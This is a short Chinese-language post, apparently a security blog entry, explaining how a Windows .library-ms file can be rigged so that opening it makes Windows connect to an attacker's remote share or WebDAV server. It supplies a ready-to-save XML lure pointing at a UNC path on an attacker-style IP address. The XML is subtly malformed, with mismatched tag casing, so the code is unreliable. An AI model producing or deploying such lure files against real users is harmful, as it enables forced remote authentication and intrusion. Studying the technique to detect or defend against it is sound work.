Skip to main content

xml攻击library-ms

library-ms攻击

这是一个win7开始引入的特性,Windows库文件(如Documents.library-ms)本质是XML配置文件,用于聚合多个文件夹视图。攻击者通过篡改其XML中的<url>字段,将其指向恶意WebDAV服务器地址或COM对象,诱导系统自动连接远程资源。例如,配置中可嵌入类似http://攻击者IP的路径,当用户打开库文件时,系统会尝试访问该地址。

将文件保存未*.library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <searchConnectorDescriptionlist>
    <searchConnectorDescription>
        <simpleLocation>
            <url>\\192.168.1.116\shared</url>
        </simpleLocation>
    </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>